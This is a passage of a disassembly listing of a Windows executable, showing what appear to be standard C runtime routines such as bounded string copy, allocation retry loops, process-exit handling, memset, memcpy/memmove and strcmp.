mov ecx, [esp+arg_0]
push ebx
xor ebx, ebx
cmp ecx, ebx
push esi
push edi
jz short loc_4076EA
mov edi, [esp+0Ch+arg_4]
cmp edi, ebx
ja short loc_407705
loc_4076EA: ; CODE XREF: sub_4076D5+B�j
; sub_4076D5+3A�j
call sub_4057D3
push 16h
pop esi
mov [eax], esi
loc_4076F4: ; CODE XREF: sub_4076D5+5D�j
push ebx
push ebx
push ebx
push ebx
push ebx
call sub_402F39
add esp, 14h
mov eax, esi
jmp short loc_407736
; ---------------------------------------------------------------------------
loc_407705: ; CODE XREF: sub_4076D5+13�j
mov esi, [esp+0Ch+arg_8]
cmp esi, ebx
jnz short loc_407711
mov [ecx], bl
jmp short loc_4076EA
; ---------------------------------------------------------------------------
loc_407711: ; CODE XREF: sub_4076D5+36�j
mov edx, ecx
loc_407713: ; CODE XREF: sub_4076D5+49�j
mov al, [esi]
mov [edx], al
inc edx
inc esi
cmp al, bl
jz short loc_407720
dec edi
jnz short loc_407713
loc_407720: ; CODE XREF: sub_4076D5+46�j
cmp edi, ebx
jnz short loc_407734
mov [ecx], bl
call sub_4057D3
push 22h
pop ecx
mov [eax], ecx
mov esi, ecx
jmp short loc_4076F4
; ---------------------------------------------------------------------------
loc_407734: ; CODE XREF: sub_4076D5+4D�j
xor eax, eax
loc_407736: ; CODE XREF: sub_4076D5+2E�j
pop edi
pop esi
pop ebx
retn
sub_4076D5 endp
; =============== S U B R O U T I N E =======================================
sub_40773A proc near ; CODE XREF: sub_404C69+3B�p
; sub_405934+48�p ...
arg_0 = dword ptr 4
push esi
push edi
xor esi, esi
loc_40773E: ; CODE XREF: sub_40773A+39�j
push [esp+8+arg_0]
call sub_4036E0
mov edi, eax
test edi, edi
pop ecx
jnz short loc_407775
cmp ds:dword_425F70, eax
jbe short loc_407775
push esi
call ds:dword_41D0FC
lea eax, [esi+3E8h]
cmp eax, ds:dword_425F70
jbe short loc_40776E
or eax, 0FFFFFFFFh
loc_40776E: ; CODE XREF: sub_40773A+2F�j
cmp eax, 0FFFFFFFFh
mov esi, eax
jnz short loc_40773E
loc_407775: ; CODE XREF: sub_40773A+12�j
; sub_40773A+1A�j
mov eax, edi
pop edi
pop esi
retn
sub_40773A endp
; =============== S U B R O U T I N E =======================================
sub_40777A proc near ; CODE XREF: sub_402DB6+5�p
; sub_40531A+30�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
push edi
xor esi, esi
loc_40777E: ; CODE XREF: sub_40777A+41�j
push 0
push [esp+0Ch+arg_4]
push [esp+10h+arg_0]
call sub_40D94F
mov edi, eax
add esp, 0Ch
test edi, edi
jnz short loc_4077BD
cmp ds:dword_425F70, eax
jbe short loc_4077BD
push esi
call ds:dword_41D0FC
lea eax, [esi+3E8h]
cmp eax, ds:dword_425F70
jbe short loc_4077B6
or eax, 0FFFFFFFFh
loc_4077B6: ; CODE XREF: sub_40777A+37�j
cmp eax, 0FFFFFFFFh
mov esi, eax
jnz short loc_40777E
loc_4077BD: ; CODE XREF: sub_40777A+1A�j
; sub_40777A+22�j
mov eax, edi
pop edi
pop esi
retn
sub_40777A endp
; =============== S U B R O U T I N E =======================================
sub_4077C2 proc near ; CODE XREF: sub_402D09+58�p
; sub_402D09+6F�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
push edi
xor esi, esi
loc_4077C6: ; CODE XREF: sub_4077C2+44�j
push [esp+8+arg_4]
push [esp+0Ch+arg_0]
call sub_40DA6D
mov edi, eax
test edi, edi
pop ecx
pop ecx
jnz short loc_407808
cmp [esp+8+arg_4], eax
jz short loc_407808
cmp ds:dword_425F70, eax
jbe short loc_407808
push esi
call ds:dword_41D0FC
lea eax, [esi+3E8h]
cmp eax, ds:dword_425F70
jbe short loc_407801
or eax, 0FFFFFFFFh
loc_407801: ; CODE XREF: sub_4077C2+3A�j
cmp eax, 0FFFFFFFFh
mov esi, eax
jnz short loc_4077C6
loc_407808: ; CODE XREF: sub_4077C2+17�j
; sub_4077C2+1D�j ...
mov eax, edi
pop edi
pop esi
retn
sub_4077C2 endp
; =============== S U B R O U T I N E =======================================
sub_40780D proc near ; CODE XREF: sub_408DD8+40�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push esi
push edi
xor esi, esi
loc_407811: ; CODE XREF: sub_40780D+49�j
push [esp+8+arg_8]
push [esp+0Ch+arg_4]
push [esp+10h+arg_0]
call sub_40DC88
mov edi, eax
add esp, 0Ch
test edi, edi
jnz short loc_407858
cmp [esp+8+arg_8], eax
jz short loc_407858
cmp ds:dword_425F70, eax
jbe short loc_407858
push esi
call ds:dword_41D0FC
lea eax, [esi+3E8h]
cmp eax, ds:dword_425F70
jbe short loc_407851
or eax, 0FFFFFFFFh
loc_407851: ; CODE XREF: sub_40780D+3F�j
cmp eax, 0FFFFFFFFh
mov esi, eax
jnz short loc_407811
loc_407858: ; CODE XREF: sub_40780D+1C�j
; sub_40780D+22�j ...
mov eax, edi
pop edi
pop esi
retn
sub_40780D endp
; =============== S U B R O U T I N E =======================================
sub_40785D proc near ; CODE XREF: J8@F_7_S:0040403F�p
; J8@F_7_S:00404065�p ...
arg_0 = dword ptr 4
call sub_409C54
push [esp+arg_0]
call sub_409AB4
push ds:off_423930
call sub_405193
push 0FFh
call eax
add esp, 0Ch
retn
sub_40785D endp
; =============== S U B R O U T I N E =======================================
sub_407881 proc near ; CODE XREF: sub_4078A7+4�p
arg_0 = dword ptr 4
push offset aMscoree_dll ; "mscoree.dll"
call ds:dword_41D0E4
test eax, eax
jz short locret_4078A6
push offset aCorexitprocess ; "CorExitProcess"
push eax
call ds:dword_41D0EC
test eax, eax
jz short locret_4078A6
push [esp+arg_0]
call eax
locret_4078A6: ; CODE XREF: sub_407881+D�j
; sub_407881+1D�j
retn
sub_407881 endp
; =============== S U B R O U T I N E =======================================
sub_4078A7 proc near ; CODE XREF: sub_4036E0+34�p
; sub_403ED3+1C�p ...
arg_0 = dword ptr 4
push [esp+arg_0]
call sub_407881
pop ecx
push [esp+arg_0]
call ds:dword_41D050
int 3 ; Trap to Debugger
sub_4078A7 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_4078BC proc near ; CODE XREF: sub_402DE5+C�p
push 8
call sub_4059F7
pop ecx
retn
sub_4078BC endp
; =============== S U B R O U T I N E =======================================
sub_4078C5 proc near ; CODE XREF: sub_402E1B�p
push 8
call sub_40591F
pop ecx
retn
sub_4078C5 endp
; =============== S U B R O U T I N E =======================================
sub_4078CE proc near ; CODE XREF: sub_407A0B+78�p
; sub_407A0B+88�p
arg_0 = dword ptr 4
push esi
mov esi, eax
jmp short loc_4078DE
; ---------------------------------------------------------------------------
loc_4078D3: ; CODE XREF: sub_4078CE+14�j
mov eax, [esi]
test eax, eax
jz short loc_4078DB
call eax
loc_4078DB: ; CODE XREF: sub_4078CE+9�j
add esi, 4
loc_4078DE: ; CODE XREF: sub_4078CE+3�j
cmp esi, [esp+4+arg_0]
jb short loc_4078D3
pop esi
retn
sub_4078CE endp
; =============== S U B R O U T I N E =======================================
sub_4078E6 proc near ; CODE XREF: sub_407979+32�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
mov esi, [esp+4+arg_0]
xor eax, eax
jmp short loc_4078FE
; ---------------------------------------------------------------------------
loc_4078EF: ; CODE XREF: sub_4078E6+1C�j
test eax, eax
jnz short loc_407904
mov ecx, [esi]
test ecx, ecx
jz short loc_4078FB
call ecx
loc_4078FB: ; CODE XREF: sub_4078E6+11�j
add esi, 4
loc_4078FE: ; CODE XREF: sub_4078E6+7�j
cmp esi, [esp+4+arg_4]
jb short loc_4078EF
loc_407904: ; CODE XREF: sub_4078E6+B�j
pop esi
retn
sub_4078E6 endp
; =============== S U B R O U T I N E =======================================
sub_407906 proc near ; CODE XREF: sub_405A28+12�p
; sub_40CB14+27�p ...
arg_0 = dword ptr 4
mov ecx, [esp+arg_0]
push esi
xor esi, esi
cmp ecx, esi
jnz short loc_40792E
loc_407911: ; CODE XREF: sub_407906+2F�j
call sub_4057D3
push esi
push esi
push esi
push esi
push esi
mov dword ptr [eax], 16h
call sub_402F39
add esp, 14h
push 16h
pop eax
pop esi
retn
; ---------------------------------------------------------------------------
loc_40792E: ; CODE XREF: sub_407906+9�j
mov eax, ds:dword_425F78
cmp eax, esi
jz short loc_407911
mov [ecx], eax
xor eax, eax
pop esi
retn
sub_407906 endp
; =============== S U B R O U T I N E =======================================
sub_40793D proc near ; CODE XREF: sub_405A28+2D�p
; sub_40F524+11F�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
push esi
xor esi, esi
cmp eax, esi
jnz short loc_407965
loc_407948: ; CODE XREF: sub_40793D+2E�j
call sub_4057D3
push esi
push esi
push esi
push esi
push esi
mov dword ptr [eax], 16h
call sub_402F39
add esp, 14h
push 16h
pop eax
pop esi
retn
; ---------------------------------------------------------------------------
loc_407965: ; CODE XREF: sub_40793D+9�j
cmp ds:dword_425F78, esi
jz short loc_407948
mov ecx, ds:dword_425F84
mov [eax], ecx
xor eax, eax
pop esi
retn
sub_40793D endp
; =============== S U B R O U T I N E =======================================
sub_407979 proc near ; CODE XREF: J8@F_7_S:0040407D�p
arg_0 = dword ptr 4
cmp ds:off_41ED94, 0
jz short loc_40799C
push offset off_41ED94
call sub_40CC52
test eax, eax
pop ecx
jz short loc_40799C
push [esp+arg_0]
call ds:off_41ED94
pop ecx
loc_40799C: ; CODE XREF: sub_407979+7�j
; sub_407979+16�j
call sub_40D59E
push offset dword_41D2D8
push offset dword_41D2BC
call sub_4078E6
test eax, eax
pop ecx
pop ecx
jnz short locret_407A0A
push esi
push edi
push offset sub_40B066
call sub_402E21
mov esi, offset dword_41D288
mov eax, esi
mov edi, offset dword_41D2B8
cmp eax, edi
pop ecx
jnb short loc_4079E2
loc_4079D3: ; CODE XREF: sub_407979+67�j
mov eax, [esi]
test eax, eax
jz short loc_4079DB
call eax
loc_4079DB: ; CODE XREF: sub_407979+5E�j
add esi, 4
cmp esi, edi
jb short loc_4079D3
loc_4079E2: ; CODE XREF: sub_407979+58�j
cmp ds:dword_434DD8, 0
pop edi
pop esi
jz short loc_407A08
push offset dword_434DD8
call sub_40CC52
test eax, eax
pop ecx
jz short loc_407A08
push 0
push 2
push 0
call ds:dword_434DD8
loc_407A08: ; CODE XREF: sub_407979+72�j
; sub_407979+81�j
xor eax, eax
locret_407A0A: ; CODE XREF: sub_407979+3B�j
retn
sub_407979 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_407A0B proc near ; CODE XREF: sub_407AD9+8�p
; sub_407AEA+8�p ...
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
; FUNCTION CHUNK AT 00407AD3 SIZE 00000006 BYTES
push 0Ch
push offset dword_4214F8
call __SEH_prolog4
push 8
call sub_4059F7
pop ecx
and [ebp+ms_exc.disabled], 0
xor esi, esi
inc esi
cmp ds:dword_425FB8, esi
jz short loc_407A99
mov ds:dword_425FB4, esi
mov al, byte ptr [ebp+arg_8]
mov ds:byte_425FB0, al
cmp [ebp+arg_4], 0
jnz short loc_407A89
push ds:dword_434DD0
call sub_405193
mov edi, eax
push ds:dword_434DCC
call sub_405193
pop ecx
pop ecx
mov [ebp+var_1C], eax
test edi, edi
jz short loc_407A79
loc_407A63: ; CODE XREF: sub_407A0B+68�j
; sub_407A0B+6C�j
sub [ebp+var_1C], 4
cmp [ebp+var_1C], edi
jb short loc_407A79
mov eax, [ebp+var_1C]
mov eax, [eax]
test eax, eax
jz short loc_407A63
call eax
jmp short loc_407A63
; ---------------------------------------------------------------------------
loc_407A79: ; CODE XREF: sub_407A0B+56�j
; sub_407A0B+5F�j
push offset dword_41D2E8
mov eax, offset dword_41D2DC
call sub_4078CE
pop ecx
loc_407A89: ; CODE XREF: sub_407A0B+35�j
push offset dword_41D2F4
mov eax, offset dword_41D2EC
call sub_4078CE
pop ecx
loc_407A99: ; CODE XREF: sub_407A0B+21�j
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
call sub_407AC4
cmp [ebp+arg_8], 0
jnz short loc_407AD3
mov ds:dword_425FB8, esi
push 8
call sub_40591F
pop ecx
push [ebp+arg_0]
call sub_4078A7
loc_407AC1: ; DATA XREF: J8@F_7_S:00421510�o
xor esi, esi
inc esi
sub_407A0B endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_407AC4 proc near ; CODE XREF: sub_407A0B+95�p
cmp dword ptr [ebp+10h], 0
jz short locret_407AD2
push 8
call sub_40591F
pop ecx
locret_407AD2: ; CODE XREF: sub_407AC4+4�j
retn
sub_407AC4 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_407A0B
loc_407AD3: ; CODE XREF: sub_407A0B+9E�j
call __SEH_epilog4
retn
; END OF FUNCTION CHUNK FOR sub_407A0B
; =============== S U B R O U T I N E =======================================
sub_407AD9 proc near ; CODE XREF: J8@F_7_S:004040B9�p
arg_0 = dword ptr 4
push 0
push 0
push [esp+8+arg_0]
call sub_407A0B
add esp, 0Ch
retn
sub_407AD9 endp
; =============== S U B R O U T I N E =======================================
sub_407AEA proc near ; CODE XREF: J8@F_7_S:004040E9�p
; sub_40DD29+D9�p ...
arg_0 = dword ptr 4
push 0
push 1
push [esp+8+arg_0]
call sub_407A0B
add esp, 0Ch
retn
sub_407AEA endp
; =============== S U B R O U T I N E =======================================
sub_407AFB proc near ; CODE XREF: J8@F_7_S:loc_4040BE�p
push 1
push 0
push 0
call sub_407A0B
add esp, 0Ch
retn
sub_407AFB endp
; =============== S U B R O U T I N E =======================================
sub_407B0A proc near ; CODE XREF: J8@F_7_S:loc_4040EE�p
push 1
push 1
push 0
call sub_407A0B
add esp, 0Ch
retn
sub_407B0A endp
; =============== S U B R O U T I N E =======================================
sub_407B19 proc near ; CODE XREF: sub_4054D6+C4�p
push esi
call sub_40518A
mov esi, eax
push esi
call sub_408058
push esi
call sub_40CAFA
push esi
call sub_402E33
push esi
call sub_40DEE3
push esi
call sub_40DED9
push esi
call sub_40DCCF
push esi
call nullsub_2
push esi
call sub_40BEDC
push offset sub_407AEA
call sub_405127
add esp, 24h
mov ds:off_423930, eax
pop esi
retn
sub_407B19 endp
; =============== S U B R O U T I N E =======================================
sub_407B65 proc near ; CODE XREF: sub_402E3D+CE�p
; sub_402F39+18�p ...
and ds:dword_434DC4, 0
retn
sub_407B65 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_407B70 proc near ; CODE XREF: sub_40177B+4A�p
; sub_40177B+5E�p ...
arg_0 = dword ptr 4
arg_4 = byte ptr 8
arg_8 = dword ptr 0Ch
mov edx, [esp+arg_8]
mov ecx, [esp+arg_0]
test edx, edx
jz short loc_407BE5
xor eax, eax
mov al, [esp+arg_4]
test al, al
jnz short loc_407B9C
cmp edx, 100h
jb short loc_407B9C
cmp ds:dword_433C7C, 0
jz short loc_407B9C
jmp sub_40DF44
; ---------------------------------------------------------------------------
loc_407B9C: ; CODE XREF: sub_407B70+14�j
; sub_407B70+1C�j ...
push edi
mov edi, ecx
cmp edx, 4
jb short loc_407BD5
neg ecx
and ecx, 3
jz short loc_407BB7
sub edx, ecx
loc_407BAD: ; CODE XREF: sub_407B70+45�j
mov [edi], al
add edi, 1
sub ecx, 1
jnz short loc_407BAD
loc_407BB7: ; CODE XREF: sub_407B70+39�j
mov ecx, eax
shl eax, 8
add eax, ecx
mov ecx, eax
shl eax, 10h
add eax, ecx
mov ecx, edx
and edx, 3
shr ecx, 2
jz short loc_407BD5
rep stosd
test edx, edx
jz short loc_407BDF
loc_407BD5: ; CODE XREF: sub_407B70+32�j
; sub_407B70+5D�j ...
mov [edi], al
add edi, 1
sub edx, 1
jnz short loc_407BD5
loc_407BDF: ; CODE XREF: sub_407B70+63�j
mov eax, [esp+4+arg_0]
pop edi
retn
; ---------------------------------------------------------------------------
loc_407BE5: ; CODE XREF: sub_407B70+A�j
mov eax, [esp+arg_0]
retn
sub_407B70 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_407BF0 proc near ; CODE XREF: sub_402F72+43�p
; sub_408DD8+35�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push edi
push esi
mov esi, [ebp+arg_4]
mov ecx, [ebp+arg_8]
mov edi, [ebp+arg_0]
mov eax, ecx
mov edx, ecx
add eax, esi
cmp edi, esi
jbe short loc_407C10
cmp edi, eax
jb loc_407DB4
loc_407C10: ; CODE XREF: sub_407BF0+16�j
cmp ecx, 100h
jb short loc_407C37
cmp ds:dword_433C7C, 0
jz short loc_407C37
push edi
push esi
and edi, 0Fh
and esi, 0Fh
cmp edi, esi
pop esi
pop edi
jnz short loc_407C37
pop esi
pop edi
pop ebp
jmp sub_40D86C
; ---------------------------------------------------------------------------
loc_407C37: ; CODE XREF: sub_407BF0+26�j
; sub_407BF0+2F�j ...
test edi, 3
jnz short loc_407C54
shr ecx, 2
and edx, 3
cmp ecx, 8
jb short loc_407C74
rep movsd
jmp off_407D64[edx*4]
; ---------------------------------------------------------------------------
align 4
loc_407C54: ; CODE XREF: sub_407BF0+4D�j
mov eax, edi
mov edx, 3
sub ecx, 4
jb short loc_407C6C
and eax, 3
add ecx, eax
jmp dword ptr loc_407C74+4[eax*4]
; ---------------------------------------------------------------------------
loc_407C6C: ; CODE XREF: sub_407BF0+6E�j
jmp dword ptr loc_407D74[ecx*4]
; ---------------------------------------------------------------------------
align 4
loc_407C74: ; CODE XREF: sub_407BF0+58�j
; sub_407BF0+B6�j ...
jmp off_407CF8[ecx*4]
; ---------------------------------------------------------------------------
align 4
dd offset loc_407C88
dd offset loc_407CB4
; ---------------------------------------------------------------------------
fdivr dword ptr [eax+eax*2+0]
loc_407C88: ; DATA XREF: sub_407BF0+8C�o
and edx, ecx
mov al, [esi]
mov [edi], al
mov al, [esi+1]
mov [edi+1], al
mov al, [esi+2]
shr ecx, 2
mov [edi+2], al
add esi, 3
add edi, 3
cmp ecx, 8
jb short loc_407C74
rep movsd
jmp off_407D64[edx*4]
; ---------------------------------------------------------------------------
align 4
loc_407CB4: ; DATA XREF: sub_407BF0+90�o
and edx, ecx
mov al, [esi]
mov [edi], al
mov al, [esi+1]
shr ecx, 2
mov [edi+1], al
add esi, 2
add edi, 2
cmp ecx, 8
jb short loc_407C74
rep movsd
jmp off_407D64[edx*4]
; ---------------------------------------------------------------------------
align 4
and edx, ecx
mov al, [esi]
mov [edi], al
add esi, 1
shr ecx, 2
add edi, 1
cmp ecx, 8
jb short loc_407C74
rep movsd
jmp off_407D64[edx*4]
; ---------------------------------------------------------------------------
align 4
off_407CF8 dd offset loc_407D5B ; DATA XREF: sub_407BF0:loc_407C74�r
dd offset loc_407D48
dd offset loc_407D40
dd offset loc_407D38
dd offset loc_407D30
dd offset loc_407D28
dd offset loc_407D20
dd offset loc_407D18
; ---------------------------------------------------------------------------
loc_407D18: ; CODE XREF: sub_407BF0:loc_407C74�j
; DATA XREF: sub_407BF0+124�o
mov eax, [esi+ecx*4-1Ch]
mov [edi+ecx*4-1Ch], eax
loc_407D20: ; CODE XREF: sub_407BF0:loc_407C74�j
; DATA XREF: sub_407BF0+120�o
mov eax, [esi+ecx*4-18h]
mov [edi+ecx*4-18h], eax
loc_407D28: ; CODE XREF: sub_407BF0:loc_407C74�j
; DATA XREF: sub_407BF0+11C�o
mov eax, [esi+ecx*4-14h]
mov [edi+ecx*4-14h], eax
loc_407D30: ; CODE XREF: sub_407BF0:loc_407C74�j
; DATA XREF: sub_407BF0+118�o
mov eax, [esi+ecx*4-10h]
mov [edi+ecx*4-10h], eax
loc_407D38: ; CODE XREF: sub_407BF0:loc_407C74�j
; DATA XREF: sub_407BF0+114�o
mov eax, [esi+ecx*4-0Ch]
mov [edi+ecx*4-0Ch], eax
loc_407D40: ; CODE XREF: sub_407BF0:loc_407C74�j
; DATA XREF: sub_407BF0+110�o
mov eax, [esi+ecx*4-8]
mov [edi+ecx*4-8], eax
loc_407D48: ; CODE XREF: sub_407BF0:loc_407C74�j
; DATA XREF: sub_407BF0+10C�o
mov eax, [esi+ecx*4-4]
mov [edi+ecx*4-4], eax
lea eax, ds:0[ecx*4]
add esi, eax
add edi, eax
loc_407D5B: ; CODE XREF: sub_407BF0:loc_407C74�j
; DATA XREF: sub_407BF0:off_407CF8�o
jmp off_407D64[edx*4]
; ---------------------------------------------------------------------------
align 4
off_407D64 dd offset loc_407D74 ; DATA XREF: sub_407BF0+5C�r
; sub_407BF0+BA�r ...
dd offset loc_407D7C
dd offset loc_407D88
dd offset loc_407D9C
; ---------------------------------------------------------------------------
loc_407D74: ; CODE XREF: sub_407BF0+5C�j
; sub_407BF0+BA�j ...
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_407D7C: ; CODE XREF: sub_407BF0+5C�j
; sub_407BF0+BA�j ...
mov al, [esi]
mov [edi], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_407D88: ; CODE XREF: sub_407BF0+5C�j
; sub_407BF0+BA�j ...
mov al, [esi]
mov [edi], al
mov al, [esi+1]
mov [edi+1], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_407D9C: ; CODE XREF: sub_407BF0+5C�j
; sub_407BF0+BA�j ...
mov al, [esi]
mov [edi], al
mov al, [esi+1]
mov [edi+1], al
mov al, [esi+2]
mov [edi+2], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_407DB4: ; CODE XREF: sub_407BF0+1A�j
lea esi, [ecx+esi-4]
lea edi, [ecx+edi-4]
test edi, 3
jnz short loc_407DE8
shr ecx, 2
and edx, 3
cmp ecx, 8
jb short loc_407DDC
std
rep movsd
cld
jmp off_407F00[edx*4]
; ---------------------------------------------------------------------------
align 4
loc_407DDC: ; CODE XREF: sub_407BF0+1DD�j
; sub_407BF0+238�j ...
neg ecx
jmp off_407EB0[ecx*4]
; ---------------------------------------------------------------------------
align 4
loc_407DE8: ; CODE XREF: sub_407BF0+1D2�j
mov eax, edi
mov edx, 3
cmp ecx, 4
jb short loc_407E00
and eax, 3
sub ecx, eax
jmp dword ptr loc_407E00+4[eax*4]
; ---------------------------------------------------------------------------
loc_407E00: ; CODE XREF: sub_407BF0+202�j
; DATA XREF: sub_407BF0+209�r
jmp off_407F00[ecx*4]
; ---------------------------------------------------------------------------
align 4
adc al, 7Eh
inc eax
add [eax], bh
jle short loc_407E4F
add [eax+7Eh], ah
inc eax
add [edx-2EDCFCBAh], cl
mov [edi+3], al
sub esi, 1
shr ecx, 2
sub edi, 1
cmp ecx, 8
jb short loc_407DDC
std
rep movsd
cld
jmp off_407F00[edx*4]
; ---------------------------------------------------------------------------
align 4
mov al, [esi+3]
and edx, ecx
mov [edi+3], al
mov al, [esi+2]
shr ecx, 2
mov [edi+2], al
sub esi, 2
sub edi, 2
loc_407E4F: ; CODE XREF: sub_407BF0+21D�j
cmp ecx, 8
jb short loc_407DDC
std
rep movsd
cld
jmp off_407F00[edx*4]
; ---------------------------------------------------------------------------
align 10h
mov al, [esi+3]
and edx, ecx
mov [edi+3], al
mov al, [esi+2]
mov [edi+2], al
mov al, [esi+1]
shr ecx, 2
mov [edi+1], al
sub esi, 3
sub edi, 3
cmp ecx, 8
jb loc_407DDC
std
rep movsd
cld
jmp off_407F00[edx*4]
; ---------------------------------------------------------------------------
align 4
dd offset loc_407EB4
dd offset loc_407EBC
dd offset loc_407EC4
dd offset loc_407ECC
dd offset loc_407ED4
dd offset loc_407EDC
dd offset loc_407EE4
off_407EB0 dd offset loc_407EF7 ; DATA XREF: sub_407BF0+1EE�r
; ---------------------------------------------------------------------------
loc_407EB4: ; DATA XREF: sub_407BF0+2A4�o
mov eax, [esi+ecx*4+1Ch]
mov [edi+ecx*4+1Ch], eax
loc_407EBC: ; DATA XREF: sub_407BF0+2A8�o
mov eax, [esi+ecx*4+18h]
mov [edi+ecx*4+18h], eax
loc_407EC4: ; DATA XREF: sub_407BF0+2AC�o
mov eax, [esi+ecx*4+14h]
mov [edi+ecx*4+14h], eax
loc_407ECC: ; DATA XREF: sub_407BF0+2B0�o
mov eax, [esi+ecx*4+10h]
mov [edi+ecx*4+10h], eax
loc_407ED4: ; DATA XREF: sub_407BF0+2B4�o
mov eax, [esi+ecx*4+0Ch]
mov [edi+ecx*4+0Ch], eax
loc_407EDC: ; DATA XREF: sub_407BF0+2B8�o
mov eax, [esi+ecx*4+8]
mov [edi+ecx*4+8], eax
loc_407EE4: ; DATA XREF: sub_407BF0+2BC�o
mov eax, [esi+ecx*4+4]
mov [edi+ecx*4+4], eax
lea eax, ds:0[ecx*4]
add esi, eax
add edi, eax
loc_407EF7: ; CODE XREF: sub_407BF0+1EE�j
; DATA XREF: sub_407BF0:off_407EB0�o
jmp off_407F00[edx*4]
; ---------------------------------------------------------------------------
align 10h
off_407F00 dd offset loc_407F10 ; DATA XREF: sub_407BF0+1E3�r
; sub_407BF0:loc_407E00�r ...
dd offset loc_407F18
dd offset loc_407F28
dd offset loc_407F3C
; ---------------------------------------------------------------------------
loc_407F10: ; CODE XREF: sub_407BF0+1E3�j
; sub_407BF0:loc_407E00�j ...
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_407F18: ; CODE XREF: sub_407BF0+1E3�j
; sub_407BF0:loc_407E00�j ...
mov al, [esi+3]
mov [edi+3], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_407F28: ; CODE XREF: sub_407BF0+1E3�j
; sub_407BF0:loc_407E00�j ...
mov al, [esi+3]
mov [edi+3], al
mov al, [esi+2]
mov [edi+2], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_407F3C: ; CODE XREF: sub_407BF0+1E3�j
; sub_407BF0:loc_407E00�j ...
mov al, [esi+3]
mov [edi+3], al
mov al, [esi+2]
mov [edi+2], al
mov al, [esi+1]
mov [edi+1], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
sub_407BF0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_407F55 proc near ; CODE XREF: sub_402FED+7�p
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
push 0Ch
push offset dword_421518
call __SEH_prolog4
push 0Eh
call sub_4059F7
pop ecx
and [ebp+ms_exc.disabled], 0
mov esi, [ebp+arg_0]
mov ecx, [esi+4]
test ecx, ecx
jz short loc_407FA6
mov eax, ds:dword_425FC0
mov edx, offset dword_425FBC
loc_407F81: ; CODE XREF: sub_407F55+65�j
mov [ebp+var_1C], eax
test eax, eax
jz short loc_407F99
cmp [eax], ecx
jnz short loc_407FB8
mov ecx, [eax+4]
mov [edx+4], ecx
push eax
call sub_403603
pop ecx
loc_407F99: ; CODE XREF: sub_407F55+31�j
push dword ptr [esi+4]
call sub_403603
pop ecx
and dword ptr [esi+4], 0
loc_407FA6: ; CODE XREF: sub_407F55+20�j
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
call sub_407FBC
call __SEH_epilog4
retn
; ---------------------------------------------------------------------------
loc_407FB8: ; CODE XREF: sub_407F55+35�j
mov edx, eax
jmp short loc_407F81
sub_407F55 endp
; =============== S U B R O U T I N E =======================================
sub_407FBC proc near ; CODE XREF: sub_407F55+58�p
; DATA XREF: J8@F_7_S:00421530�o
push 0Eh
call sub_40591F
pop ecx
retn
sub_407FBC endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_407FD0 proc near ; CODE XREF: sub_403017+C�p
; sub_40B1FC+25�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov edx, [esp+arg_0]
mov ecx, [esp+arg_4]
test edx, 3
jnz short loc_40801C
loc_407FE0: ; CODE XREF: sub_407FD0+3C�j
; sub_407FD0+6A�j ...
mov eax, [edx]
cmp al, [ecx]
jnz short loc_408014
or al, al
jz short loc_408010
cmp ah, [ecx+1]
jnz short loc_408014
or ah, ah
jz short loc_408010
shr eax, 10h
cmp al, [ecx+2]
jnz short loc_408014
or al, al
jz short loc_408010
cmp ah, [ecx+3]
jnz short loc_408014
add ecx, 4
add edx, 4
or ah, ah
jnz short loc_407FE0
mov edi, edi
loc_408010: ; CODE XREF: sub_407FD0+18�j
; sub_407FD0+21�j ...
xor eax, eax
retn
; ---------------------------------------------------------------------------
align 4
loc_408014: ; CODE XREF: sub_407FD0+14�j
; sub_407FD0+1D�j ...
sbb eax, eax
shl eax, 1
add eax, 1
retn
; ---------------------------------------------------------------------------
loc_40801C: ; CODE XREF: sub_407FD0+E�j
test edx, 1
jz short loc_40803C
mov al, [edx]
add edx, 1
cmp al, [ecx]
jnz short loc_408014
add ecx, 1
or al, al
jz short loc_408010
test edx, 2
jz short loc_407FE0
loc_40803C: ; CODE XREF: sub_407FD0+52�j
mov ax, [edx]
add edx, 2
cmp al, [ecx]
jnz short loc_408014
or al, al
jz short loc_408010
cmp ah, [ecx+1]
jnz short loc_408014
or ah, ah
jz short loc_408010
add ecx, 2
jmp short loc_407FE0
sub_407FD0 endp
; =============== S U B R O U T I N E =======================================
sub_408058 proc near ; CODE XREF: sub_407B19+9�p
arg_0 = dword ptr 4
